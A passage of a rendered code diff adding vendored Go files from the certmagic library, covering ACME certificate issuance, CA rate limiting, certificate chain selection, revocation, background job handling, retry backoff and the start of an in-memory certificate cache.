||||
return client, nil
|
||||
}
|
||||
|
||||
func (c *acmeClient) throttle(ctx context.Context, names []string) error {
|
||||
// throttling is scoped to CA + account email
|
||||
rateLimiterKey := c.acmeClient.Directory + "," + c.iss.Email
|
||||
rateLimitersMu.Lock()
|
||||
rl, ok := rateLimiters[rateLimiterKey]
|
||||
if !ok {
|
||||
rl = NewRateLimiter(RateLimitEvents, RateLimitEventsWindow)
|
||||
rateLimiters[rateLimiterKey] = rl
|
||||
// TODO: stop rate limiter when it is garbage-collected...
|
||||
}
|
||||
rateLimitersMu.Unlock()
|
||||
if c.iss.Logger != nil {
|
||||
c.iss.Logger.Info("waiting on internal rate limiter",
|
||||
zap.Strings("identifiers", names),
|
||||
zap.String("ca", c.acmeClient.Directory),
|
||||
zap.String("account", c.iss.Email),
|
||||
)
|
||||
}
|
||||
err := rl.Wait(ctx)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if c.iss.Logger != nil {
|
||||
c.iss.Logger.Info("done waiting on internal rate limiter",
|
||||
zap.Strings("identifiers", names),
|
||||
zap.String("ca", c.acmeClient.Directory),
|
||||
zap.String("account", c.iss.Email),
|
||||
)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *acmeClient) usingTestCA() bool {
|
||||
return c.iss.TestCA != "" && c.acmeClient.Directory == c.iss.TestCA
|
||||
}
|
||||
|
||||
func (c *acmeClient) revoke(ctx context.Context, cert *x509.Certificate, reason int) error {
|
||||
return c.acmeClient.RevokeCertificate(ctx, c.account,
|
||||
cert, c.account.PrivateKey, reason)
|
||||
}
|
||||
|
||||
func buildUAString() string {
|
||||
ua := "CertMagic"
|
||||
if UserAgent != "" {
|
||||
ua = UserAgent + " " + ua
|
||||
}
|
||||
return ua
|
||||
}
|
||||
|
||||
// These internal rate limits are designed to prevent accidentally
|
||||
// firehosing a CA's ACME endpoints. They are not intended to
|
||||
// replace or replicate the CA's actual rate limits.
|
||||
//
|
||||
// Let's Encrypt's rate limits can be found here:
|
||||
// https://letsencrypt.org/docs/rate-limits/
|
||||
//
|
||||
// Currently (as of December 2019), Let's Encrypt's most relevant
|
||||
// rate limit for large deployments is 300 new orders per account
|
||||
// per 3 hours (on average, or best case, that's about 1 every 36
|
||||
// seconds, or 2 every 72 seconds, etc.); but it's not reasonable
|
||||
// to try to assume that our internal state is the same as the CA's
|
||||
// (due to process restarts, config changes, failed validations,
|
||||
// etc.) and ultimately, only the CA's actual rate limiter is the
|
||||
// authority. Thus, our own rate limiters do not attempt to enforce
|
||||
// external rate limits. Doing so causes problems when the domains
|
||||
// are not in our control (i.e. serving customer sites) and/or lots
|
||||
// of domains fail validation: they clog our internal rate limiter
|
||||
// and nearly starve out (or at least slow down) the other domains
|
||||
// that need certificates. Failed transactions are already retried
|
||||
// with exponential backoff, so adding in rate limiting can slow
|
||||
// things down even more.
|
||||
//
|
||||
// Instead, the point of our internal rate limiter is to avoid
|
||||
// hammering the CA's endpoint when there are thousands or even
|
||||
// millions of certificates under management. Our goal is to
|
||||
// allow small bursts in a relatively short timeframe so as to
|
||||
// not block any one domain for too long, without unleashing
|
||||
// thousands of requests to the CA at once.
|
||||
var (
|
||||
rateLimiters = make(map[string]*RingBufferRateLimiter)
|
||||
rateLimitersMu sync.RWMutex
|
||||
|
||||
// RateLimitEvents is how many new events can be allowed
|
||||
// in RateLimitEventsWindow.
|
||||
RateLimitEvents = 10
|
||||
|
||||
// RateLimitEventsWindow is the size of the sliding
|
||||
// window that throttles events.
|
||||
RateLimitEventsWindow = 10 * time.Second
|
||||
)
|
||||
|
||||
// Some default values passed down to the underlying ACME client.
|
||||
var (
|
||||
UserAgent string
|
||||
HTTPTimeout = 30 * time.Second
|
||||
)
|
466
vendor/github.com/caddyserver/certmagic/acmeissuer.go
generated
vendored
Normal file
466
vendor/github.com/caddyserver/certmagic/acmeissuer.go
generated
vendored
Normal file
@ -0,0 +1,466 @@
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/x509"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"sort"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez"
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// ACMEIssuer gets certificates using ACME. It implements the PreChecker,
|
||||
// Issuer, and Revoker interfaces.
|
||||
//
|
||||
// It is NOT VALID to use an ACMEIssuer without calling NewACMEIssuer().
|
||||
// It fills in any default values from DefaultACME as well as setting up
|
||||
// internal state that is necessary for valid use. Always call
|
||||
// NewACMEIssuer() to get a valid ACMEIssuer value.
|
||||
type ACMEIssuer struct {
|
||||
// The endpoint of the directory for the ACME
|
||||
// CA we are to use
|
||||
CA string
|
||||
|
||||
// TestCA is the endpoint of the directory for
|
||||
// an ACME CA to use to test domain validation,
|
||||
// but any certs obtained from this CA are
|
||||
// discarded
|
||||
TestCA string
|
||||
|
||||
// The email address to use when creating or
|
||||
// selecting an existing ACME server account
|
||||
Email string
|
||||
|
||||
// The PEM-encoded private key of the ACME
|
||||
// account to use; only needed if the account
|
||||
// is already created on the server and
|
||||
// can be looked up with the ACME protocol
|
||||
AccountKeyPEM string
|
||||
|
||||
// Set to true if agreed to the CA's
|
||||
// subscriber agreement
|
||||
Agreed bool
|
||||
|
||||
// An optional external account to associate
|
||||
// with this ACME account
|
||||
ExternalAccount *acme.EAB
|
||||
|
||||
// Disable all HTTP challenges
|
||||
DisableHTTPChallenge bool
|
||||
|
||||
// Disable all TLS-ALPN challenges
|
||||
DisableTLSALPNChallenge bool
|
||||
|
||||
// The host (ONLY the host, not port) to listen
|
||||
// on if necessary to start a listener to solve
|
||||
// an ACME challenge
|
||||
ListenHost string
|
||||
|
||||
// The alternate port to use for the ACME HTTP
|
||||
// challenge; if non-empty, this port will be
|
||||
// used instead of HTTPChallengePort to spin up
|
||||
// a listener for the HTTP challenge
|
||||
AltHTTPPort int
|
||||
|
||||
// The alternate port to use for the ACME
|
||||
// TLS-ALPN challenge; the system must forward
|
||||
// TLSALPNChallengePort to this port for
|
||||
// challenge to succeed
|
||||
AltTLSALPNPort int
|
||||
|
||||
// The solver for the dns-01 challenge;
|
||||
// usually this is a DNS01Solver value
|
||||
// from this package
|
||||
DNS01Solver acmez.Solver
|
||||
|
||||
// TrustedRoots specifies a pool of root CA
|
||||
// certificates to trust when communicating
|
||||
// over a network to a peer.
|
||||
TrustedRoots *x509.CertPool
|
||||
|
||||
// The maximum amount of time to allow for
|
||||
// obtaining a certificate. If empty, the
|
||||
// default from the underlying ACME lib is
|
||||
// used. If set, it must not be too low so
|
||||
// as to cancel challenges too early.
|
||||
CertObtainTimeout time.Duration
|
||||
|
||||
// Address of custom DNS resolver to be used
|
||||
// when communicating with ACME server
|
||||
Resolver string
|
||||
|
||||
// Callback function that is called before a
|
||||
// new ACME account is registered with the CA;
|
||||
// it allows for last-second config changes
|
||||
// of the ACMEIssuer and the Account.
|
||||
// (TODO: this feature is still EXPERIMENTAL and subject to change)
|
||||
NewAccountFunc func(context.Context, *ACMEIssuer, acme.Account) (acme.Account, error)
|
||||
|
||||
// Preferences for selecting alternate
|
||||
// certificate chains
|
||||
PreferredChains ChainPreference
|
||||
|
||||
// Set a logger to enable logging
|
||||
Logger *zap.Logger
|
||||
|
||||
config *Config
|
||||
httpClient *http.Client
|
||||
}
|
||||
|
||||
// NewACMEIssuer constructs a valid ACMEIssuer based on a template
|
||||
// configuration; any empty values will be filled in by defaults in
|
||||
// DefaultACME, and if any required values are still empty, sensible
|
||||
// defaults will be used.
|
||||
//
|
||||
// Typically, you'll create the Config first with New() or NewDefault(),
|
||||
// then call NewACMEIssuer(), then assign the return value to the Issuers
|
||||
// field of the Config.
|
||||
func NewACMEIssuer(cfg *Config, template ACMEIssuer) *ACMEIssuer {
|
||||
if cfg == nil {
|
||||
panic("cannot make valid ACMEIssuer without an associated CertMagic config")
|
||||
}
|
||||
if template.CA == "" {
|
||||
template.CA = DefaultACME.CA
|
||||
}
|
||||
if template.TestCA == "" && template.CA == DefaultACME.CA {
|
||||
// only use the default test CA if the CA is also
|
||||
// the default CA; no point in testing against
|
||||
// Let's Encrypt's staging server if we are not
|
||||
// using their production server too
|
||||
template.TestCA = DefaultACME.TestCA
|
||||
}
|
||||
if template.Email == "" {
|
||||
template.Email = DefaultACME.Email
|
||||
}
|
||||
if template.AccountKeyPEM == "" {
|
||||
template.AccountKeyPEM = DefaultACME.AccountKeyPEM
|
||||
}
|
||||
if !template.Agreed {
|
||||
template.Agreed = DefaultACME.Agreed
|
||||
}
|
||||
if template.ExternalAccount == nil {
|
||||
template.ExternalAccount = DefaultACME.ExternalAccount
|
||||
}
|
||||
if !template.DisableHTTPChallenge {
|
||||
template.DisableHTTPChallenge = DefaultACME.DisableHTTPChallenge
|
||||
}
|
||||
if !template.DisableTLSALPNChallenge {
|
||||
template.DisableTLSALPNChallenge = DefaultACME.DisableTLSALPNChallenge
|
||||
}
|
||||
if template.ListenHost == "" {
|
||||
template.ListenHost = DefaultACME.ListenHost
|
||||
}
|
||||
if template.AltHTTPPort == 0 {
|
||||
template.AltHTTPPort = DefaultACME.AltHTTPPort
|
||||
}
|
||||
if template.AltTLSALPNPort == 0 {
|
||||
template.AltTLSALPNPort = DefaultACME.AltTLSALPNPort
|
||||
}
|
||||
if template.DNS01Solver == nil {
|
||||
template.DNS01Solver = DefaultACME.DNS01Solver
|
||||
}
|
||||
if template.TrustedRoots == nil {
|
||||
template.TrustedRoots = DefaultACME.TrustedRoots
|
||||
}
|
||||
if template.CertObtainTimeout == 0 {
|
||||
template.CertObtainTimeout = DefaultACME.CertObtainTimeout
|
||||
}
|
||||
if template.Resolver == "" {
|
||||
template.Resolver = DefaultACME.Resolver
|
||||
}
|
||||
if template.NewAccountFunc == nil {
|
||||
template.NewAccountFunc = DefaultACME.NewAccountFunc
|
||||
}
|
||||
if template.Logger == nil {
|
||||
template.Logger = DefaultACME.Logger
|
||||
}
|
||||
template.config = cfg
|
||||
return &template
|
||||
}
|
||||
|
||||
// IssuerKey returns the unique issuer key for the
|
||||
// confgured CA endpoint.
|
||||
func (am *ACMEIssuer) IssuerKey() string {
|
||||
return am.issuerKey(am.CA)
|
||||
}
|
||||
|
||||
func (*ACMEIssuer) issuerKey(ca string) string {
|
||||
key := ca
|
||||
if caURL, err := url.Parse(key); err == nil {
|
||||
key = caURL.Host
|
||||
if caURL.Path != "" {
|
||||
// keep the path, but make sure it's a single
|
||||
// component (i.e. no forward slashes, and for
|
||||
// good measure, no backward slashes either)
|
||||
const hyphen = "-"
|
||||
repl := strings.NewReplacer(
|
||||
"/", hyphen,
|
||||
"\\", hyphen,
|
||||
)
|
||||
path := strings.Trim(repl.Replace(caURL.Path), hyphen)
|
||||
if path != "" {
|
||||
key += hyphen + path
|
||||
}
|
||||
}
|
||||
}
|
||||
return key
|
||||
}
|
||||
|
||||
// PreCheck performs a few simple checks before obtaining or
|
||||
// renewing a certificate with ACME, and returns whether this
|
||||
// batch is eligible for certificates if using Let's Encrypt.
|
||||
// It also ensures that an email address is available.
|
||||
func (am *ACMEIssuer) PreCheck(ctx context.Context, names []string, interactive bool) error {
|
||||
publicCA := strings.Contains(am.CA, "api.letsencrypt.org") || strings.Contains(am.CA, "acme.zerossl.com")
|
||||
if publicCA {
|
||||
for _, name := range names {
|
||||
if !SubjectQualifiesForPublicCert(name) {
|
||||
return fmt.Errorf("subject does not qualify for a public certificate: %s", name)
|
||||
}
|
||||
}
|
||||
}
|
||||
return am.getEmail(ctx, interactive)
|
||||
}
|
||||
|
||||
// Issue implements the Issuer interface. It obtains a certificate for the given csr using
|
||||
// the ACME configuration am.
|
||||
func (am *ACMEIssuer) Issue(ctx context.Context, csr *x509.CertificateRequest) (*IssuedCertificate, error) {
|
||||
if am.config == nil {
|
||||
panic("missing config pointer (must use NewACMEIssuer)")
|
||||
}
|
||||
|
||||
var isRetry bool
|
||||
if attempts, ok := ctx.Value(AttemptsCtxKey).(*int); ok {
|
||||
isRetry = *attempts > 0
|
||||
}
|
||||
|
||||
cert, usedTestCA, err := am.doIssue(ctx, csr, isRetry)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// important to note that usedTestCA is not necessarily the same as isRetry
|
||||
// (usedTestCA can be true if the main CA and the test CA happen to be the same)
|
||||
if isRetry && usedTestCA && am.CA != am.TestCA {
|
||||
// succeeded with testing endpoint, so try again with production endpoint
|
||||
// (only if the production endpoint is different from the testing endpoint)
|
||||
// TODO: This logic is imperfect and could benefit from some refinement.
|
||||
// The two CA endpoints likely have different states, which could cause one
|
||||
// to succeed and the other to fail, even if it's not a validation error.
|
||||
// Two common cases would be:
|
||||
// 1) Rate limiter state. This is more likely to cause prod to fail while
|
||||
// staging succeeds, since prod usually has tighter rate limits. Thus, if
|
||||
// initial attempt failed in prod due to rate limit, first retry (on staging)
|
||||
// might succeed, and then trying prod again right way would probably still
|
||||
// fail; normally this would terminate retries but the right thing to do in
|
||||
// this case is to back off and retry again later. We could refine this logic
|
||||
// to stick with the production endpoint on retries unless the error changes.
|
||||
// 2) Cached authorizations state. If a domain validates successfully with
|
||||
// one endpoint, but then the other endpoint is used, it might fail, e.g. if
|
||||
// DNS was just changed or is still propagating. In this case, the second CA
|
||||
// should continue to be retried with backoff, without switching back to the
|
||||
// other endpoint. This is more likely to happen if a user is testing with
|
||||
// the staging CA as the main CA, then changes their configuration once they
|
||||
// think they are ready for the production endpoint.
|
||||
cert, _, err = am.doIssue(ctx, csr, false)
|
||||
if err != nil {
|
||||
// succeeded with test CA but failed just now with the production CA;
|
||||
// either we are observing differing internal states of each CA that will
|
||||
// work out with time, or there is a bug/misconfiguration somewhere
|
||||
// externally; it is hard to tell which! one easy cue is whether the
|
||||
// error is specifically a 429 (Too Many Requests); if so, we should
|
||||
// probably keep retrying
|
||||
var problem acme.Problem
|
||||
if errors.As(err, &problem) {
|
||||
if problem.Status == http.StatusTooManyRequests {
|
||||
// DON'T abort retries; the test CA succeeded (even
|
||||
// if it's cached, it recently succeeded!) so we just
|
||||
// need to keep trying (with backoff) until this CA's
|
||||
// rate limits expire...
|
||||
// TODO: as mentioned in comment above, we would benefit
|
||||
// by pinning the main CA at this point instead of
|
||||
// needlessly retrying with the test CA first each time
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
return nil, ErrNoRetry{err}
|
||||
}
|
||||
}
|
||||
|
||||
return cert, err
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) doIssue(ctx context.Context, csr *x509.CertificateRequest, useTestCA bool) (*IssuedCertificate, bool, error) {
|
||||
client, err := am.newACMEClientWithAccount(ctx, useTestCA, false)
|
||||
if err != nil {
|
||||
return nil, false, err
|
||||
}
|
||||
usingTestCA := client.usingTestCA()
|
||||
|
||||
nameSet := namesFromCSR(csr)
|
||||
|
||||
if !useTestCA {
|
||||
if err := client.throttle(ctx, nameSet); err != nil {
|
||||
return nil, usingTestCA, err
|
||||
}
|
||||
}
|
||||
|
||||
certChains, err := client.acmeClient.ObtainCertificateUsingCSR(ctx, client.account, csr)
|
||||
if err != nil {
|
||||
return nil, usingTestCA, fmt.Errorf("%v %w (ca=%s)", nameSet, err, client.acmeClient.Directory)
|
||||
}
|
||||
if len(certChains) == 0 {
|
||||
return nil, usingTestCA, fmt.Errorf("no certificate chains")
|
||||
}
|
||||
|
||||
preferredChain := am.selectPreferredChain(certChains)
|
||||
|
||||
ic := &IssuedCertificate{
|
||||
Certificate: preferredChain.ChainPEM,
|
||||
Metadata: preferredChain,
|
||||
}
|
||||
|
||||
return ic, usingTestCA, nil
|
||||
}
|
||||
|
||||
// selectPreferredChain sorts and then filters the certificate chains to find the optimal
|
||||
// chain preferred by the client. If there's only one chain, that is returned without any
|
||||
// processing. If there are no matches, the first chain is returned.
|
||||
func (am *ACMEIssuer) selectPreferredChain(certChains []acme.Certificate) acme.Certificate {
|
||||
if len(certChains) == 1 {
|
||||
if am.Logger != nil && (len(am.PreferredChains.AnyCommonName) > 0 || len(am.PreferredChains.RootCommonName) > 0) {
|
||||
am.Logger.Debug("there is only one chain offered; selecting it regardless of preferences",
|
||||
zap.String("chain_url", certChains[0].URL))
|
||||
}
|
||||
return certChains[0]
|
||||
}
|
||||
|
||||
if am.PreferredChains.Smallest != nil {
|
||||
if *am.PreferredChains.Smallest {
|
||||
sort.Slice(certChains, func(i, j int) bool {
|
||||
return len(certChains[i].ChainPEM) < len(certChains[j].ChainPEM)
|
||||
})
|
||||
} else {
|
||||
sort.Slice(certChains, func(i, j int) bool {
|
||||
return len(certChains[i].ChainPEM) > len(certChains[j].ChainPEM)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
if len(am.PreferredChains.AnyCommonName) > 0 || len(am.PreferredChains.RootCommonName) > 0 {
|
||||
// in order to inspect, we need to decode their PEM contents
|
||||
decodedChains := make([][]*x509.Certificate, len(certChains))
|
||||
for i, chain := range certChains {
|
||||
certs, err := parseCertsFromPEMBundle(chain.ChainPEM)
|
||||
if err != nil {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Error("unable to parse PEM certificate chain",
|
||||
zap.Int("chain", i),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
decodedChains[i] = certs
|
||||
}
|
||||
|
||||
if len(am.PreferredChains.AnyCommonName) > 0 {
|
||||
for _, prefAnyCN := range am.PreferredChains.AnyCommonName {
|
||||
for i, chain := range decodedChains {
|
||||
for _, cert := range chain {
|
||||
if cert.Issuer.CommonName == prefAnyCN {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Debug("found preferred certificate chain by issuer common name",
|
||||
zap.String("preference", prefAnyCN),
|
||||
zap.Int("chain", i))
|
||||
}
|
||||
return certChains[i]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if len(am.PreferredChains.RootCommonName) > 0 {
|
||||
for _, prefRootCN := range am.PreferredChains.RootCommonName {
|
||||
for i, chain := range decodedChains {
|
||||
if chain[len(chain)-1].Issuer.CommonName == prefRootCN {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Debug("found preferred certificate chain by root common name",
|
||||
zap.String("preference", prefRootCN),
|
||||
zap.Int("chain", i))
|
||||
}
|
||||
return certChains[i]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if am.Logger != nil {
|
||||
am.Logger.Warn("did not find chain matching preferences; using first")
|
||||
}
|
||||
}
|
||||
|
||||
return certChains[0]
|
||||
}
|
||||
|
||||
// Revoke implements the Revoker interface. It revokes the given certificate.
|
||||
func (am *ACMEIssuer) Revoke(ctx context.Context, cert CertificateResource, reason int) error {
|
||||
client, err := am.newACMEClientWithAccount(ctx, false, false)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
certs, err := parseCertsFromPEMBundle(cert.CertificatePEM)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return client.revoke(ctx, certs[0], reason)
|
||||
}
|
||||
|
||||
// ChainPreference describes the client's preferred certificate chain,
|
||||
// useful if the CA offers alternate chains. The first matching chain
|
||||
// will be selected.
|
||||
type ChainPreference struct {
|
||||
// Prefer chains with the fewest number of bytes.
|
||||
Smallest *bool
|
||||
|
||||
// Select first chain having a root with one of
|
||||
// these common names.
|
||||
RootCommonName []string
|
||||
|
||||
// Select first chain that has any issuer with one
|
||||
// of these common names.
|
||||
AnyCommonName []string
|
||||
}
|
||||
|
||||
// DefaultACME specifies default settings to use for ACMEIssuers.
|
||||
// Using this value is optional but can be convenient.
|
||||
var DefaultACME = ACMEIssuer{
|
||||
CA: LetsEncryptProductionCA,
|
||||
TestCA: LetsEncryptStagingCA,
|
||||
}
|
||||
|
||||
// Some well-known CA endpoints available to use.
|
||||
const (
|
||||
LetsEncryptStagingCA = "https://acme-staging-v02.api.letsencrypt.org/directory"
|
||||
LetsEncryptProductionCA = "https://acme-v02.api.letsencrypt.org/directory"
|
||||
ZeroSSLProductionCA = "https://acme.zerossl.com/v2/DV90"
|
||||
)
|
||||
|
||||
// prefixACME is the storage key prefix used for ACME-specific assets.
|
||||
const prefixACME = "acme"
|
||||
|
||||
// Interface guards
|
||||
var (
|
||||
_ PreChecker = (*ACMEIssuer)(nil)
|
||||
_ Issuer = (*ACMEIssuer)(nil)
|
||||
_ Revoker = (*ACMEIssuer)(nil)
|
||||
)
|
187
vendor/github.com/caddyserver/certmagic/async.go
generated
vendored
Normal file
187
vendor/github.com/caddyserver/certmagic/async.go
generated
vendored
Normal file
@ -0,0 +1,187 @@
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"log"
|
||||
"runtime"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
var jm = &jobManager{maxConcurrentJobs: 1000}
|
||||
|
||||
type jobManager struct {
|
||||
mu sync.Mutex
|
||||
maxConcurrentJobs int
|
||||
activeWorkers int
|
||||
queue []namedJob
|
||||
names map[string]struct{}
|
||||
}
|
||||
|
||||
type namedJob struct {
|
||||
name string
|
||||
job func() error
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// Submit enqueues the given job with the given name. If name is non-empty
|
||||
// and a job with the same name is already enqueued or running, this is a
|
||||
// no-op. If name is empty, no duplicate prevention will occur. The job
|
||||
// manager will then run this job as soon as it is able.
|
||||
func (jm *jobManager) Submit(logger *zap.Logger, name string, job func() error) {
|
||||
jm.mu.Lock()
|
||||
defer jm.mu.Unlock()
|
||||
if jm.names == nil {
|
||||
jm.names = make(map[string]struct{})
|
||||
}
|
||||
if name != "" {
|
||||
// prevent duplicate jobs
|
||||
if _, ok := jm.names[name]; ok {
|
||||
return
|
||||
}
|
||||
jm.names[name] = struct{}{}
|
||||
}
|
||||
jm.queue = append(jm.queue, namedJob{name, job, logger})
|
||||
if jm.activeWorkers < jm.maxConcurrentJobs {
|
||||
jm.activeWorkers++
|
||||
go jm.worker()
|
||||
}
|
||||
}
|
||||
|
||||
func (jm *jobManager) worker() {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: certificate worker: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
jm.mu.Lock()
|
||||
if len(jm.queue) == 0 {
|
||||
jm.activeWorkers--
|
||||
jm.mu.Unlock()
|
||||
return
|
||||
}
|
||||
next := jm.queue[0]
|
||||
jm.queue = jm.queue[1:]
|
||||
jm.mu.Unlock()
|
||||
if err := next.job(); err != nil {
|
||||
if next.logger != nil {
|
||||
next.logger.Error("job failed", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if next.name != "" {
|
||||
jm.mu.Lock()
|
||||
delete(jm.names, next.name)
|
||||
jm.mu.Unlock()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func doWithRetry(ctx context.Context, log *zap.Logger, f func(context.Context) error) error {
|
||||
var attempts int
|
||||
ctx = context.WithValue(ctx, AttemptsCtxKey, &attempts)
|
||||
|
||||
// the initial intervalIndex is -1, signaling
|
||||
// that we should not wait for the first attempt
|
||||
start, intervalIndex := time.Now(), -1
|
||||
var err error
|
||||
|
||||
for time.Since(start) < maxRetryDuration {
|
||||
var wait time.Duration
|
||||
if intervalIndex >= 0 {
|
||||
wait = retryIntervals[intervalIndex]
|
||||
}
|
||||
timer := time.NewTimer(wait)
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
timer.Stop()
|
||||
return context.Canceled
|
||||
case <-timer.C:
|
||||
err = f(ctx)
|
||||
attempts++
|
||||
if err == nil || errors.Is(err, context.Canceled) {
|
||||
return err
|
||||
}
|
||||
var errNoRetry ErrNoRetry
|
||||
if errors.As(err, &errNoRetry) {
|
||||
return err
|
||||
}
|
||||
if intervalIndex < len(retryIntervals)-1 {
|
||||
intervalIndex++
|
||||
}
|
||||
if time.Since(start) < maxRetryDuration {
|
||||
if log != nil {
|
||||
log.Error("will retry",
|
||||
zap.Error(err),
|
||||
zap.Int("attempt", attempts),
|
||||
zap.Duration("retrying_in", retryIntervals[intervalIndex]),
|
||||
zap.Duration("elapsed", time.Since(start)),
|
||||
zap.Duration("max_duration", maxRetryDuration))
|
||||
}
|
||||
} else {
|
||||
if log != nil {
|
||||
log.Error("final attempt; giving up",
|
||||
zap.Error(err),
|
||||
zap.Int("attempt", attempts),
|
||||
zap.Duration("elapsed", time.Since(start)),
|
||||
zap.Duration("max_duration", maxRetryDuration))
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
// ErrNoRetry is an error type which signals
|
||||
// to stop retries early.
|
||||
type ErrNoRetry struct{ Err error }
|
||||
|
||||
// Unwrap makes it so that e wraps e.Err.
|
||||
func (e ErrNoRetry) Unwrap() error { return e.Err }
|
||||
func (e ErrNoRetry) Error() string { return e.Err.Error() }
|
||||
|
||||
type retryStateCtxKey struct{}
|
||||
|
||||
// AttemptsCtxKey is the context key for the value
|
||||
// that holds the attempt counter. The value counts
|
||||
// how many times the operation has been attempted.
|
||||
// A value of 0 means first attempt.
|
||||
var AttemptsCtxKey retryStateCtxKey
|
||||
|
||||
// retryIntervals are based on the idea of exponential
|
||||
// backoff, but weighed a little more heavily to the
|
||||
// front. We figure that intermittent errors would be
|
||||
// resolved after the first retry, but any errors after
|
||||
// that would probably require at least a few minutes
|
||||
// to clear up: either for DNS to propagate, for the
|
||||
// administrator to fix their DNS or network properties,
|
||||
// or some other external factor needs to change. We
|
||||
// chose intervals that we think will be most useful
|
||||
// without introducing unnecessary delay. The last
|
||||
// interval in this list will be used until the time
|
||||
// of maxRetryDuration has elapsed.
|
||||
var retryIntervals = []time.Duration{
|
||||
1 * time.Minute,
|
||||
2 * time.Minute,
|
||||
2 * time.Minute,
|
||||
5 * time.Minute, // elapsed: 10 min
|
||||
10 * time.Minute,
|
||||
20 * time.Minute,
|
||||
20 * time.Minute, // elapsed: 1 hr
|
||||
30 * time.Minute,
|
||||
30 * time.Minute, // elapsed: 2 hr
|
||||
1 * time.Hour,
|
||||
3 * time.Hour, // elapsed: 6 hr
|
||||
6 * time.Hour, // for up to maxRetryDuration
|
||||
}
|
||||
|
||||
// maxRetryDuration is the maximum duration to try
|
||||
// doing retries using the above intervals.
|
||||
const maxRetryDuration = 24 * time.Hour * 30
|
364
vendor/github.com/caddyserver/certmagic/cache.go
generated
vendored
Normal file
364
vendor/github.com/caddyserver/certmagic/cache.go
generated
vendored
Normal file
@ -0,0 +1,364 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
weakrand "math/rand" // seeded elsewhere
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Cache is a structure that stores certificates in memory.
|
||||
// A Cache indexes certificates by name for quick access
|
||||
// during TLS handshakes, and avoids duplicating certificates
|
||||
// in memory. Generally, there should only be one per process.
|
||||
// However, that is not a strict requirement; but using more
|
||||
// than one is a code smell, and may indicate an
|
||||
// over-engineered design.
|
||||
//
|
||||
// An empty cache is INVALID and must not be used. Be sure
|
||||
// to call NewCache to get a valid value.
|
||||
//
|
||||
// These should be very long-lived values and must not be
|
||||
// copied. Before all references leave scope to be garbage
|
||||
// collected, ensure you call Stop() to stop maintenance on
|
||||
// the certificates stored in this cache and release locks.
|
||||
//
|
||||
// Caches are not usually manipulated directly; create a
|
||||
// Config value with a pointer to a Cache, and then use
|
||||
// the Config to interact with the cache. Caches are
|
||||
// agnostic of any particular storage or ACME config,
|
||||
// since each certificate may be managed and stored
|
||||
// differently.
|
||||
type Cache struct {
|
||||
// User configuration of the cache
|
||||
options CacheOptions
|
||||
|
||||
// The cache is keyed by certificate hash
|
||||
cache map[string]Certificate
|
||||
|
||||
// cacheIndex is a map of SAN to cache key (cert hash)
|
||||
cacheIndex map[string][]string
|
||||
|
||||
// Protects the cache and index maps
|
||||
mu sync.RWMutex
|
||||
|
||||
// Close this channel to cancel asset maintenance
|
||||
stopChan chan struct{}
|
||||
|
||||
// Used to signal when stopping is completed
|
||||
doneChan chan struct{}
|
||||
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewCache returns a new, valid Cache for efficiently
|
||||
// accessing certificates in memory. It also begins a
|
||||
// maintenance goroutine to tend to the certificates
|
||||
// in the cache. Call Stop() when you are done with the
|
||||
// cache so it can clean up locks and stuff.
|
||||
//
|
||||
// Most users of this package will not need to call this
|
||||
// because a default certificate cache is created for you.
|
||||
// Only advanced use cases require creating a new cache.
|
||||
//
|
||||
// This function panics if opts.GetConfigForCert is not
|
||||
// set. The reason is that a cache absolutely needs to
|
||||
// be able to get a Config with which to manage TLS
|
||||
// assets, and it is not safe to assume that the Default
|
||||
// config is always the correct one, since you have
|
||||
// created the cache yourself.
|
||||
//
|
||||
// See the godoc for Cache to use it properly. When
|
||||
// no longer needed, caches should be stopped with
|
||||
